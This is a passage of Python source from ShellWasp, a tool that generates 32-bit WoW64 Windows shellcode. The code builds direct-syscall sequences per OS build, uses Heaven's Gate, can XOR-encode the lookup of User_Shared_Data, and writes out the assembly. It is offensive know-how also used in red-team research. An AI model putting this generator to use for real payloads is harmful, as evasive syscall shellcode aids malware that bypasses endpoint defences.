+\"\\n\"\r\n\t\telse:\r\n\t\t\tgenerateInitializer+=\"jl less\" +str(t) +\"\\n\"\r\n\r\n\r\n\r\n\t\tfor mySyscall in syscallChoices:\r\n\t\t\t# winVersion=winOSReverseLookupHex[osChoice]\r\n\t\t\tif mySyscall not in listOfSyscallsAdded:\r\n\t\t\t\tlistOfSyscallsAdded.append(mySyscall)\r\n\t\t\t\tif winVersion==\"Windows 10\":\r\n\t\t\t\t\twinRelease=builds.win10ReverseLookupBackup[osChoice]\r\n\t\t\t\telif winVersion==\"Windows 7\":\r\n\t\t\t\t\twinRelease=builds.win7ReverseLookupHex[osChoice]\r\n\t\t\t\telif winVersion==\"Windows 11\":\r\n\t\t\t\t\twinRelease=builds.win11ReverseLookupHex[osChoice]\r\n\r\n\t\t\t\t# winRelease2=builds.win11ReverseLookupHex[\"ntallocatevirtualmemory\"].casefold()\r\n\t\t\t\r\n\t\t\t\t# print (\"winRelease\", winRelease)\r\n\t\t\t\tmySyscallComment=\"\"\r\n\t\t\t\tif sh.show_comments:\r\n\t\t\t\t\tmySyscallComment= \"; \"+ gre+mySyscall+res\r\n\t\t\t\t# print (\"winRelease\", winRelease, osChoice)\r\n\t\t\t\ttemp=\"push \" + hex(syscalls.reverseSyscall_dict[winVersion][winRelease][mySyscall]) + \"\\t\\t\" + mySyscallComment+\"\\n\"\r\n\t\t\t\t# print (temp)\r\n\t\t\t\tgenerateInitializer+=temp\r\n\t\t# generateInitializer+=\"jmp done\\n\"\r\n\t\t\t\t\r\n\t\tif t !=(numChoices):\r\n\t\t\tgenerateInitializer+=\"jmp saveSyscallArray\\nless\" +str(t)+\":\\n\"\r\n\r\n\t\tt+=1\r\n\t\trevlistOfSyscallsAdded=listOfSyscallsAdded.copy()\r\n\t\trevlistOfSyscallsAdded.reverse()\r\n\t\tlistOfSyscallsAdded.clear()\t\r\n\t\twt=0\r\n\t\tfor each in revlistOfSyscallsAdded:\r\n\t\t\tdictSyscallEDILocations[each]=wt\r\n\t\t\twt+=1\r\n\t##################################\r\n\t# z=0\r\n\r\n\r\n\t# for mySyscall in syscallChoices:\r\n\t# \tsysPrototype= (syscall_signature[mySyscall])\r\n\t# \tnumSyscallParams=sysPrototype[0]\r\n\t# \tt=numSyscallParams-1\r\n\t# \tgenerateSyscallParams+=\"push edi\\n\"\r\n\t# \tfor each in range(numSyscallParams):\r\n\t# \t\t# temp=\"push 0x00000000 ; param \" + str(t)\r\n\t# \t\tcommentSyscallParams=\"\"\r\n\t# \t\tif sh.show_comments:\r\n\t# \t\t\tcommentSyscallParams=\"; \" + cya+ sysPrototype[1][t] + \" \" + yel+ sysPrototype[2][t] +res\r\n\t# \t\tgenerateSyscallParams+=\"push 0x00000000 \\t\" + commentSyscallParams +\"\\n\"\r\n\t# \t\tt-=1\r\n\t# \tgenerateSyscallParams+=\"\\n\"\r\n\r\n\r\n\tif integrateAI:\r\n\t\tFUNCS_PER_BLOCK = 5\r\n\t\tsyscallHeaderSuffixes = {\"NtProtectVirtualMemory\": \"with RWX\"}\r\n\r\n\t\tapi_blocks = buildApiBlocksFromSyscalls(syscallChoices=syscallChoices, syscall_signature=syscall_signature, funcsPerBlock=FUNCS_PER_BLOCK,syscallHeaderSuffixes=syscallHeaderSuffixes)\r\n\t\taiFinalResult = buildPossibleValues(apiBlocks=api_blocks,chunkSize=1,resumeCurrent=False,autoSaveCurrent=False,baseDir=None,debugOutput=False)\r\n\t\t# print (aiFinalResult)\r\n\r\n\taiState = initAiState(aiFinalResult) if integrateAI else None\r\n\tfor mySyscall in syscallChoices:\r\n\t\tsysPrototype = syscall_signature[mySyscall]\r\n\t\tnumSyscallParams = sysPrototype[0]\r\n\t\tt = numSyscallParams - 1\r\n\t\tgenerateSyscallParams += \"push edi\\n\"\r\n\t\taiCallEntry = None\r\n\t\tif integrateAI:\r\n\t\t\taiCallEntry = getNextAiCallEntry(aiState)\r\n\r\n\t\tfor each in range(numSyscallParams):\r\n\t\t\tcommentSyscallParams = \"\"\r\n\t\t\tparamType = sysPrototype[1][t]\r\n\t\t\tparamName = sysPrototype[2][t]\r\n\r\n\t\t\t# Path 3: OpenAI illustrative mode\r\n\t\t\tif integrateAI and aiCallEntry:\r\n\t\t\t\tpushValue, additionalComment, structureRef = getAiPushEntry(aiCallEntry, each)\r\n\t\t\t\tif sh.show_comments:\r\n\t\t\t\t\tcommentSyscallParams = buildSampleValsComment(paramType,paramName,additionalComment)\r\n\t\t\t\tgenerateSyscallParams += buildAlignedPushLine(pushValue,commentSyscallParams) + \"\\n\"\r\n\t\t\t\tif showStruct and structureRef:\r\n\t\t\t\t\tgenerateSyscallParams += buildStructLinesFromAi(structureRef,aiState)\r\n\r\n\t\t\t# Path 2: original offline illustrative mode\r\n\t\t\telif sampleVals and mySyscall in syscallPossibleValues:\r\n\t\t\t\tsyscallEntry = syscallPossibleValues[mySyscall]\r\n\t\t\t\tpushList = syscallEntry.get(\"pushes\", [])\r\n\t\t\t\tif each < len(pushList):\r\n\t\t\t\t\tpushEntry = pushList[each]\r\n\t\t\t\t\tpushValue = pushEntry.get(\"value\", \"0x00000000\")\r\n\t\t\t\t\tadditionalComment = pushEntry.get(\"additionalComment\", \"\")\r\n\t\t\t\t\tstructureRef = pushEntry.get(\"structureRef\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tpushValue = \"0x00000000\"\r\n\t\t\t\t\tadditionalComment = \"\"\r\n\t\t\t\t\tstructureRef = None\r\n\t\t\t\tif sh.show_comments:\r\n\t\t\t\t\tcommentSyscallParams = buildSampleValsComment(paramType,paramName,additionalComment)\r\n\t\t\t\tgenerateSyscallParams += buildAlignedPushLine(pushValue,commentSyscallParams) + \"\\n\"\r\n\t\t\t\tif showStruct and structureRef:\r\n\t\t\t\t\tgenerateSyscallParams += buildStructLines(structureRef,\tsyscallEntry)\r\n\r\n\t\t\t# Path 1: original no-sample-values mode\r\n\t\t\telse:\r\n\t\t\t\tif sh.show_comments:\r\n\t\t\t\t\tcommentSyscallParams = cya + paramType + res + \" \" + blu + paramName + res\r\n\t\t\t\tgenerateSyscallParams += buildAlignedPushLine(\"0x00000000\",\tcommentSyscallParams) + \"\\n\"\r\n\t\t\tt -= 1\r\n\r\n\t\tgenerateSyscallParams += \"\\n\"\r\n\r\n\t\tsyscallComment=\"\"\r\n\t\tz = dictSyscallEDILocations[mySyscall]\r\n\t\tif sh.show_comments:\r\n\t\t\tsyscallComment=\"; \" +gre+ mySyscall + \" syscall\"+res\r\n\t\tif z==0:\r\n\t\t\tgenerateSyscallParams+=\"mov eax, [edi]\\t\\t\"+syscallComment+\"\\ncall ourSyscall\\n\\n\"\r\n\t\telse:\r\n\t\t\tgenerateSyscallParams+=\"mov eax, [edi+\"+hex(z*4)+\"]\\t\"+syscallComment+\"\\ncall ourSyscall\\n\\n\"\r\n\t\t# z+=1\r\n\t\t\r\n\t\tediRestoral=0\r\n\t\tif sh.style==\"fs\":\r\n\t\t\tediRestoral=hex(numSyscallParams*4)\r\n\t\telse:\r\n\t\t\t# ediRestoral=hex(4+numSyscallParams*4)\r\n\t\t\tediRestoral=hex(numSyscallParams*4)\r\n\r\n\t\tstackCleanupRestore=\"mov edi, [esp+\" + ediRestoral +\"]\\n\\n\"\r\n\t\t# stackCleanupRestore=\"add esp, \" + hex(numSyscallParams*4) + \"\\n\" // DEPRECATED\r\n\t\t# stackCleanupRestore+=\"pop edi\\n\\n\" // DEPRECATED\r\n\t\t#### mov edi, [esp+0x] provides greater stability for a shellcode with a longer sequence of syscalls. \r\n\t\tgenerateSyscallParams +=stackCleanupRestore\r\n\r\n\t# print (win10ReverseLookup[\"15063\"])\r\n\r\n\t# print (hex(sysCallName))\r\n\r\n\t\r\n\tfinalSyscallShellcode= initializerStart+generateInitializer+endInitializer+generateSyscallParams+ endShellcode0+ ourSyscall + endShellcode1\r\n\t\r\n\tout= finalSyscallShellcode\r\n\t\r\n\t\r\n\tfinalSyscallShellcode = finalSyscallShellcode.replace(gre,'')\r\n\tfinalSyscallShellcode = finalSyscallShellcode.replace(res,'')\r\n\tfinalSyscallShellcode = finalSyscallShellcode.replace(mag,'')\r\n\tfinalSyscallShellcode = finalSyscallShellcode.replace(yel,'')\r\n\tfinalSyscallShellcode = finalSyscallShellcode.replace(blu,'')\r\n\tfinalSyscallShellcode = finalSyscallShellcode.replace(res,'')\r\n\tfinalSyscallShellcode = finalSyscallShellcode.replace(cya,'')\r\n\tfinalSyscallShellcodeText=finalSyscallShellcode\r\n\t# finalSyscallShellcode = finalSyscallShellcode.replace(';','#')\r\n\tout2= finalSyscallShellcode\r\n\r\n\t# print (finalSyscallShellcodeText)\r\n\r\n\t#generate bytes\r\n\t# generateBytes(finalSyscallShellcode)\r\n\t\r\n\r\n\tif print_to_file:\r\n\t\ttime = datetime.datetime.now()\r\n\t\tfiletime = time.strftime(\"%Y%m%d_%H%M%S\")\r\n\t\t\r\n\t\twin=\"Win\"\r\n\t\tif isWin7():\r\n\t\t\twin+=\"7\"\r\n\t\tif isWin1011():\r\n\t\t\twin+=\"1011\"\r\n\t\t\r\n\t\tt=0\r\n\t\tsys=\"\"\r\n\t\tfor each in sh.list_of_syscalls:\r\n\t\t\tif t<3:\r\n\t\t\t\tsys+=each+\"_\"\r\n\t\t\tt+=1\r\n\r\n\t\toutputFileName=win+\"_\"+sys+filetime+\".txt\"\r\n\t\t\r\n\t\toutput_dir = os.getcwd()\r\n\r\n\t\tmyOutDir = \"current_dir\" #todo\r\n\t\tif myOutDir == \"current_dir\":\r\n\t\t\toutput_dir = os.path.join(os.path.dirname(__file__), \"Syscall Output\")\r\n\t\telse:\r\n\t\t\toutput_dir = myOutDir #todo\r\n\r\n\t\ttxtFileName = os.path.join(output_dir, outputFileName)\r\n\t\tos.makedirs(os.path.dirname(txtFileName), exist_ok=True)\r\n\t\ttext = open(txtFileName, \"w\")\r\n\t\ttext.write (out2)\r\n\t\t# text.write(emulation_txt)\r\n\t\ttext.close()\r\n\r\n\t\tprint(red+\" Saved file to: \"+res, txtFileName)\r\n\t\t\r\n\t# if sh.printStringLiteral:\r\n\t# \tprint(sRaw.bytesShellcode)\r\n\r\n\t# \tprint(sRaw.shellCodeStrLit)\r\n\r\n\treturn out\r\n\r\nSYSCALL_BOOL_DICT = {\r\n\"l\": False,\r\n\"d\": False,\r\n\"D\": False,\r\n\"all\": False,\r\n\"xp\": False,\r\n\"xp1\": False,\r\n\"xp2\": False,\r\n\"s3\": False,\r\n\"s30\": False,\r\n\"s32\": False,\r\n\"s3r\": False,\r\n\"s3r2\": False,\r\n\"v\": False,\r\n\"v0\": False,\r\n\"v1\": False,\r\n\"v2\": False,\r\n\"s8\": False,\r\n\"s80\": False,\r\n\"s82\": False,\r\n\"s8r\": False,\r\n\"s8r1\": False,\r\n\"w7\": False,\r\n\"w70\": False,\r\n\"w71\": False,\r\n\"s12\": False,\r\n\"s120\": False,\r\n\"s12r\": False,\r\n\"w8\": False,\r\n\"w80\": False,\r\n\"w81\": False,\r\n\"w10\": False,\r\n\"r0\": False,\r\n\"r1\": False,\r\n\"r2\": False,\r\n\"r3\": False,\r\n\"r4\": False,\r\n\"r5\": False,\r\n\"r6\": False,\r\n\"r7\": False,\r\n\"r8\": False,\r\n\"r9\": False,\r\n\"r10\": False}\r\n\r\ndef selectFindOSBuildText():\r\n\tif sh.encodeUSD:\r\n\t\ttogE=res+\"[\"+gre+\"X\"+res+\"]\"\r\n\telse:\r\n\t\ttogE=res+\"[\"+gre+\" \"+res+\"]\"\r\n\tif sh.addUSD:\r\n\t\ttogA=res+\"[\"+gre+\"X\"+res+\"]\"\r\n\telse:\r\n\t\ttogA=res+\"[\"+gre+\" \"+res+\"]\"\r\n\r\n\ttogK=res+\"[\"+gre+hex(sh.encodeUSDKey)+res+\"]\"\r\n\ttogAV=res+\"[\"+gre+hex(sh.addUSDVal)+res+\"]\"\r\n\r\n\ttogP=res+\"[\"+gre+\" \"+res+\"]\"\r\n\tif sh.useSharedData:\r\n\t\ttogSD=res+\"[\"+gre+\"X\"+res+\"]\"\r\n\telse:\r\n\t\ttogSD=res+\"[\"+gre+\" \"+res+\"]\"\r\n\r\n\tif sh.user12Teb:\r\n\t\ttogR=res+\"[\"+gre+\"X\"+res+\"]\"\r\n\t\ttogP=res+\"[\"+gre+\" \"+res+\"]\"\r\n\telse:\r\n\t\ttogR=res+\"[\"+gre+\" \"+res+\"]\"\r\n\t\ttogP=res+\"[\"+gre+\"X\"+res+\"]\"\r\n\r\n\r\n\ttext=\" ShellWasp offers different ways to identify the OSBuild in WoW64 shellcode.\\n If more than one is selected, it will try {} first and then {}. \\n {} is default or used if others are not supported by OS.\\n\\n\".format(gre+\"r12_PEB\"+res, gre+\"User_Shared_Data\"+res,gre+\"fs_PEB\"+res)\r\n\r\n\r\n\r\n\r\n\r\n\ttext+=yel+\" {}\\t {} {} {} Uses {} to find PEB and identify OS Build\\n\".format(cya+\"1\"+res,mag+\"fs_PEB\" +res, togP, \"-\"+yel, cya+\"fs:[0x30]\"+yel)\r\n\ttext+=red+\"\\t\\t\\tSupported:\"+res+\" Windows 7-11\\n\"\r\n\t\r\n\ttext+=yel+\" {}\\t {} {} {} Uses {} and {} to find PEB and identify OS Build\\n\".format(cya+\"2\"+res,mag+\"r12_PEB\" +res, togR, \"-\"+yel, cya+\"Heaven's Gate\"+yel, cya+\"r12\"+yel)\r\n\r\n\ttext+=\"\\t\\t\\t \"+res+\"x64 code, \"+cya+\"mov ebx,dword ptr [r12]\"+res+ \", gets\"+cya+\" TEB\"+res+\" from \"+cya+\"TEB64\"+res+\".\\n\"+res\r\n\ttext+=red+\"\\t\\t\\tSupported:\"+res+\" Windows 7-11\\n\"\r\n\r\n\ttext+=yel+\" {}\\t {} {} {} Uses {} to identify OS Build\\n\".format(cya+\"3\"+res,mag+\"usd\" +res, togSD, \"-\"+yel, cya+\"User_Shared_Data\"+yel, cya+\"r12\"+yel)\r\n\ttext+=red+\"\\t\\t\\tSupported:\"+res+\" Windows 10-11\\n\"\r\n\t\r\n\t# text+=\"\\t\\t\\t \"+res+\"Supported only on Win10/11.\\n\\n\"\r\n\ttext+=yel+\" {}\\t {} {} {} Encode {} to determine OS build with XOR key {}.{}\\n\".format(cya+\"4\"+res,mag+\"encode\" +res, togE,\"-\"+yel,cya+ \"User_Shared_Data\"+yel,cya+hex(sh.encodeUSDKey),res)\r\n\ttext+=yel+\" {}\\t {} {} {} Change XOR key for encoding {}.\\n\".format(cya+\"5\"+res,mag+\"xor\" +res,togK,\"-\"+yel,cya+\"User_Shared_Data\"+res)\r\n\ttext+=yel+\" {}\\t {} {} {} Get {} by adding {} to starting value, {}.{}\\n\".format(cya+\"6\"+res,mag+\"add\" +res, togA,\"-\"+yel,cya+ \"User_Shared_Data\"+yel,gre+hex(sh.addUSDVal)+yel,cya+hex(0x7ffe0260 -sh.addUSDVal) +yel,res)\r\n\ttext+=yel+\" {}\\t {} {} {} Change value to add to get {}.{}\\n\\n\".format(cya+\"7\"+res,mag+\"add_val\" +res, togAV,\"-\"+yel,cya+ \"User_Shared_Data\"+yel,res)\r\n\r\n\r\n\ttext+=gre+\" {} {} Show this submenu\\n\".format(cya+\"h\"+gre, res+\"-\"+gre)\r\n\ttext+=gre+\" {} {} Exit\\n\".format(cya+\"x\"+gre,res+\"-\"+gre)\r\n\r\n\treturn text\r\ndef selectFindOSBuild():\r\n\ttext=selectFindOSBuildText()\r\n\tprint (text)\r\n\tuserIN=\"\"\r\n\twhile userIN != \"e\" or userIN !=\"x\":\t\t#Loops on keyboard input\r\n\t\ttry:\t\t\t#Will break the loop on entering x\r\n\t\t\tprint(yel + \" ShellWasp>\"+ cya+\"Style>\" + mag + \"OSBuild>\" +res, end=\"\")\r\n\t\t\tuserIN = input()\r\n\t\t\tprint(res)\r\n\t\t\tif userIN[0:1] == \"1\" or userIN[0:2] == \"fs\":\r\n\t\t\t\tsh.user12Teb=False\r\n\t\t\t\tsh.useSharedData=False\r\n\t\t\t\tprint (\" \"+mag+\"fs_PEB \"+res+\"is always on by default, but it can be overridden by other choices.\"+res)\r\n\t\t\t\tprint (\" \"+mag+\"r12_PEB\"+res+\" changed to: \", gre+str(sh.user12Teb)+res)\r\n\t\t\t\tprint (\" \"+mag+\"User_Shared_Data\"+res+\" changed to: \", gre+str(sh.useSharedData)+res)\r\n\t\t\t\tprint (\"\\n Type {} or {} to exit\".format(red+\"x\"+res, red+\"q\"+res))\r\n\r\n\r\n\t\t\telif userIN[0:1] == \"2\" or userIN[0:2].lower() == \"fs\".lower():\r\n\t\t\t\tsh.user12Teb=True\r\n\t\t\t\tsh.useSharedData=False\r\n\t\t\t\tprint (\" \"+mag+\"r12_PEB\"+res+\" changed to: \", gre+str(sh.user12Teb)+res)\r\n\t\t\t\tprint (\" \"+mag+\"User_Shared_Data\"+res+\" changed to: \", gre+str(sh.useSharedData)+res)\r\n\t\t\t\tprint (\"\\n Type {} or {} to exit\".format(red+\"x\"+res, red+\"q\"+res))\r\n\r\n\t\t\telif userIN[0:1] == \"3\" or userIN[0:3] == \"r12\":\r\n\t\t\t\tsh.user12Teb=False\r\n\t\t\t\tsh.useSharedData=True\r\n\t\t\t\tprint (\" \"+mag+\"r12_PEB\"+res+\" changed to: \", gre+str(sh.user12Teb)+res)\r\n\t\t\t\tprint (\" \"+mag+\"User_Shared_Data\"+res+\" changed to: \", gre+str(sh.useSharedData)+res)\r\n\t\t\t\tprint (\"\\n Type {} or {} to exit\".format(red+\"x\"+res, red+\"q\"+res))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t\t\telif userIN[0:1] == \"4\" or userIN[0:6].lower() == \"encode\".lower():\r\n\t\t\t\tif not sh.encodeUSD:\r\n\t\t\t\t\tsh.encodeUSD=True\r\n\t\t\t\telse:\r\n\t\t\t\t\tsh.encodeUSD=False\r\n\t\t\t\tprint (\" Encode User_Shared_Data: \", mag+str(sh.encodeUSD)+res)\r\n\t\t\telif userIN[0:1] == \"5\" or userIN[0:3].lower() == \"xor\".lower():\r\n\t\t\t\thexInput=input(\" Enter hexadecimal XOR key: \")\r\n\t\t\t\ttry: \r\n\t\t\t\t\tsh.encodeUSDKey=int(hexInput,16)\r\n\t\t\t\texcept:\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tsh.encodeUSDKey=int(\"0x\"+hexInput,16)\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tprint (red+\" Unacceptable input.\"+res)\r\n\t\t\t\tprint (\" XOR key: \" + mag+hex(sh.encodeUSDKey)+res)\r\n\t\t\telif userIN[0:1] == \"6\" or userIN[0:3].lower() == \"add\".lower():\r\n\t\t\t\tif not sh.addUSD:\r\n\t\t\t\t\tsh.addUSD=True\r\n\t\t\t\telse:\r\n\t\t\t\t\tsh.addUSD=False\r\n\t\t\t\tprint (\" Add User_Shared_Data: \", mag+str(sh.encodeUSD)+res)\t\t\t\t\r\n\t\t\telif userIN[0:1] == \"7\" or userIN[0:7].lower() == \"add_val\".lower():\r\n\t\t\t\tprint(\" ShellWasp gets the {} by adding two values to get {}.\".format(cya+\"User_Shared_Data\"+res, cya+\"0x7ffe0260\"+res))\r\n\t\t\t\tprint(\" Supply the value to be added; ShellWasp will calcuate the starting point.\\n\".format(cya+\"User_Shared_Data\"+res))\r\n\r\n\t\t\t\thexInput=input(\" Enter hexadecimal add value: \")\r\n\t\t\t\ttemp=0\r\n\t\t\t\ttry: \r\n\t\t\t\t\ttemp=int(hexInput,16)\r\n\t\t\t\t\tif len(hex(temp))>10:\r\n\t\t\t\t\t\tprint (\" Input is too large.\")\r\n\t\t\t\t\telif temp>0x7ffe0260:\r\n\t\t\t\t\t\tprint (\" Select a value less than \"+cya+\"0x7ffe0260.\"+res)\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tsh.addUSDVal=temp\r\n\t\t\t\texcept:\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\ttemp=int(\"0x\"+hexInput,16)\r\n\t\t\t\t\t\tif len(hex(temp))>10:\r\n\t\t\t\t\t\t\tprint (\" Input is too large.\")\r\n\t\t\t\t\t\telif temp>0x7ffe0260:\r\n\t\t\t\t\t\t\tprint (\" Select a value less than \"+cya+\"0x7ffe0260.\"+res)\r\n\t\t\t\t\t\t\tcontinue\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tsh.addUSDVal=temp\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tprint (red+\" Unacceptable input.\"+res,temp )\r\n\t\t\t\ttext=\" ShellWasp will add {} to {} to get {}\\n\".format(mag + hex(sh.addUSDVal)+res, mag + hex(0x7ffe0260-sh.addUSDVal)+res, cya+\"User_Shared_Data\"+res )\r\n\t\t\t\tprint(text)\r\n\r\n\r\n\r\n\t\t\telif userIN[0:1] == \"q\" or userIN[0:1] == \"x\":\r\n\t\t\t\tbreak\t\t\t\r\n\t\t\telif userIN[0:1] == \"h\":\r\n\t\t\t\tprint(selectFindOSBuildText())\r\n\t\t\telse:\r\n\t\t\t\tprint(\" Invalid input. Enter \" + red + \"x\"+res+\" to exit Style submenu.\\n\")\r\n\t\texcept Exception as e:\r\n\t\t\tprint (e)\r\n\t\t\tprint(traceback.format_exc())\r\n\t\t\tprint (\"exception\")\r\n\r\n\r\ndef selectSyscallStyle():\r\n\tif sh.style==\"x64\":\r\n\t\ttogX64=res+\"[\"+gre+\"X\"+res+\"]\"\r\n\t\ttogFs=res+\"[\"+gre+\" \"+res+\"]\"\r\n\t\ttogX=res+\"[\"+gre+\" \"+res+\"]\"\r\n\telif sh.style==\"fs\":\r\n\t\ttogFs=res+\"[\"+gre+\"X\"+res+\"]\"\r\n\t\ttogX64=res+\"[\"+gre+\" \"+res+\"]\"\r\n\t\ttogX=res+\"[\"+gre+\" \"+res+\"]\"\r\n\telif sh.style==\"x64Ex\":\r\n\t\ttogFs=res+\"[\"+gre+\" \"+res+\"]\"\r\n\t\ttogX64=res+\"[\"+gre+\" \"+res+\"]\"\r\n\t\ttogX=res+\"[\"+gre+\"X\"+res+\"]\"\r\n\r\n\ttext=\" ShellWasp offers different ways to invoke the syscall for 32-bit, WoW64 shellcode:\\n\"\r\n\ttext+=yel+\" {}\\t {} {} {} Uses {} to invoke syscall\\n\".format(cya+\"1\"+res,mag+\"fs\" +res, togFs, \"-\"+yel, cya+\"fs:[0xc0]\"+yel)\r\n\ttext+=yel+\" {}\\t {} {} {} Uses Heaven's gate and executes {} to invoke syscall\\n\".format(cya+\"2\"+res,mag+\"x64\" +res, togX64,\"-\"+yel, cya+\"x64 code\"+yel)\r\n\ttext+=yel+\" {}\\t {} {} {} Uses Heaven's gate and executes {} to invoke syscall\\n\".format(cya+\"3\"+res,mag+\"x64Ex\" +res, togX,\"-\"+yel, cya+\"extended x64 code\"+yel)\r\n\ttext+=yel+\" \\t\\t Win10/11 only\\n\".format(cya+\"\"+res)\r\n\r\n\r\n\t# text+=gre+\"\\n Note:\"+res+\" The way in which the syscall is invoked differs based on OS. ShellWasp manages this\\n\\tbased on your selections of targeted OS builds.\\n \"\r\n\r\n\tprint (text)\r\n\tuserIN=\"\"\r\n\twhile userIN != \"e\" or userIN !=\"x\":\t\t#Loops on keyboard input\r\n\t\ttry:\t\t\t#Will break the loop on entering x\r\n\t\t\tprint(yel + \" ShellWasp>\"+ cya+\"Style>\" + mag + \"Syscall>\" +res, end=\"\")\r\n\t\t\tuserIN = input()\r\n\t\t\tprint(res)\r\n\t\t\tif userIN[0:1] == \"1\" or userIN[0:2] == \"fs\":\r\n\t\t\t\tsh.style=\"fs\"\r\n\t\t\t\tprint (\" Style changed to: \", mag+sh.style+res)\r\n\t\t\t\tprint (\" This method is most similar to what the OS does naturally with syscalls in WoW64.\"+res)\r\n\r\n\t\t\t\tbreak\r\n\t\t\telif userIN[0:1] == \"3\" or userIN[0:5].lower() == \"x64Ex\".lower():\r\n\t\t\t\tsh.style=\"x64Ex\"\r\n\t\t\t\tprint (\" Style changed to: \", mag+sh.style+res)\r\n\t\t\t\tprint (\" This method uses {} to preserve and restore stack and CPU context (registers).\".format(cya+\"WOW64_CONTEXT\"+res))\r\n\t\t\t\tbreak\t\t\t\t\r\n\t\t\telif userIN[0:1] == \"2\" or userIN[0:3] == \"x64\":\r\n\t\t\t\tsh.style=\"x64\"\r\n\t\t\t\tprint (\" Style changed to: \", mag+sh.style+res)\r\n\t\t\t\tprint (\" This method uses {} to preserve and restore stack and CPU context (registers).\".format(cya+\"WOW64_CONTEXT\"+res))\r\n\t\t\t\tbreak\r\n\t\t\telif userIN[0:1] == \"q\" or userIN[0:1] == \"x\":\r\n\t\t\t\tbreak\t\t\t\r\n\t\t\telse:\r\n\t\t\t\tprint(\" Invalid input. Enter \" + red + \"x\"+res+\" to exit Style submenu.\\n\")\r\n\t\texcept Exception as e:\r\n\t\t\tprint (e)\r\n\t\t\tprint(traceback.format_exc())\r\n\t\t\tprint (\"exception\")\r\n\r\ndef selectCompilerStyle():\r\n\tif sh.intendedCompiler==\"nasm\":\r\n\t\ttogN=res+\"[\"+gre+\"X\"+res+\"]\"\r\n\t\ttogV=res+\"[\"+gre+\" \"+res+\"]\"\r\n\telif sh.intendedCompiler==\"inlineVS\":\r\n\t\ttogV=res+\"[\"+gre+\"X\"+res+\"]\"\r\n\t\ttogN=res+\"[\"+gre+\" \"+res+\"]\"\r\n\r\n\ttext=\" When invoking the syscall via Heaven's gate and executing x64 code, there are different options\\n on how to represent x64 code. Different formats are required based on compiler:\\n\"\r\n\t\r\n\ttext+=yel+\" {}\\t {} {} {} Uses x64 bytes in the style of {} for compilers like {}\\n\".format(cya+\"1\"+res,mag+\"nasm\" +res, togN, \"-\"+yel,cya+\"db 0xde,0xad,0xbe,0xef\"+yel, cya+\"NASM\"+res)\r\n\t\r\n\ttext+=yel+\" {}\\t {} {} {} Prepares x64 bytes for {} using the emit keyword:{}\\n\".format(cya+\"2\"+res,mag+\"inlineVS\" +res, togV,\"-\"+yel,cya+ \"VisualStudio inline Assembly\"+yel, cya+\"\\n\\t\\t_emit 0xde\\n\\t\\t_emit 0xad\\n\\t\\t_emit 0xbe\\n\\t\\t_emit 0xef\\n\"+res)\r\n\r\n\tprint (text)\r\n\tuserIN=\"\"\r\n\twhile userIN != \"e\" or userIN !=\"x\":\t\t#Loops on keyboard input\r\n\t\ttry:\t\t\t#Will break the loop on entering x\r\n\t\t\tprint(yel + \" ShellWasp>\"+ cya+\"Style>\" + mag + \"Format>\" +res, end=\"\")\r\n\t\t\tuserIN = input()\r\n\t\t\tprint(res)\r\n\t\t\tif userIN[0:1] == \"1\" or userIN[0:4] == \"nasm\":\r\n\t\t\t\tsh.intendedCompiler =\"nasm\"\r\n\t\t\t\tprint (\" Style changed to: \", mag+sh.intendedCompiler+res)\r\n\t\t\t\tbreak\r\n\t\t\tif userIN[0:1] == \"2\" or userIN[0:8].lower() == \"inlineVS\".lower():\r\n\t\t\t\tsh.intendedCompiler =\"inlineVS\"\r\n\t\t\t\tprint (\" Style changed to: \", mag+sh.intendedCompiler+res)\r\n\t\t\t\tbreak\r\n\t\t\tif userIN[0:1] == \"q\" or userIN[0:1] == \"x\":\r\n\t\t\t\tbreak\t\t\t\r\n\t\t\telse:\r\n\t\t\t\tprint(\" Invalid input. Enter \" + red + \"x\"+res+\" to exit Style.\\n\")\r\n\t\texcept Exception as e:\r\n\t\t\tprint (e)\r\n\t\t\tprint(traceback.format_exc())\r\n\t\t\tprint (\"exception\")\r\n\r\ndef selectUserSharedOptions():\r\n\tif sh.useSharedData:\r\n\t\ttogU=res+\"[\"+gre+\"X\"+res+\"]\"\r\n\t\ttogF=res+\"[\"+gre+\" \"+res+\"]\"\r\n\telse:\r\n\t\ttogF=res+\"[\"+gre+\"X\"+res+\"]\"\r\n\t\ttogU=res+\"[\"+gre+\" \"+res+\"]\"\r\n\tif sh.encodeUSD:\r\n\t\ttogE=res+\"[\"+gre+\"X\"+res+\"]\"\r\n\telse:\r\n\t\ttogE=res+\"[\"+gre+\" \"+res+\"]\"\r\n\tif sh.addUSD:\r\n\t\ttogA=res+\"[\"+gre+\"X\"+res+\"]\"\r\n\telse:\r\n\t\ttogA=res+\"[\"+gre+\" \"+res+\"]\"\r\n\r\n\ttogK=res+\"[\"+gre+hex(sh.encodeUSDKey)+res+\"]\"\r\n\ttogAV=res+\"[\"+gre+hex(sh.addUSDVal)+res+\"]\"\r\n\r\n\ttogP=res+\"[\"+gre+\" \"+res+\"]\"\r\n\tif sh.useSharedData:\r\n\t\ttogSD=res+\"[\"+gre+\"X\"+res+\"]\"\r\n\telse:\r\n\t\ttogSD=res+\"[\"+gre+\" \"+res+\"]\"\r\n\r\n\tif sh.user12Teb:\r\n\t\ttogR=res+\"[\"+gre+\"X\"+res+\"]\"\r\n\t\ttogP=res+\"[\"+gre+\" \"+res+\"]\"\r\n\telse:\r\n\t\ttogR=res+\"[\"+gre+\" \"+res+\"]\"\r\n\t\ttogP=res+\"[\"+gre+\"X\"+res+\"]\"\r\n\r\n\r\n\ttext=\" When targeting only \"+cya+\"Win10/11\"+res+\", the\"+gre+\" User_Shared_Data\"+res+\" or \"+gre+\"PEB\"+res+\" can determine OS build.\\n\"\r\n\t\r\n\ttext+=yel+\" {}\\t {} {} {} Use the {} and {} to determine OS build.\\n\".format(cya+\"1\"+res,mag+\"fs\" +res, togF, \"-\"+yel,cya+\"TEB\"+yel, cya+\"fs:[0x30]\"+yel)\r\n\ttext+=red+\"\\t\\t\\tSupported:\"+res+\" Windows 7-11\\n\"\r\n\r\n\t\r\n\ttext+=yel+\" {}\\t {} {} {} Use {} to determine OS 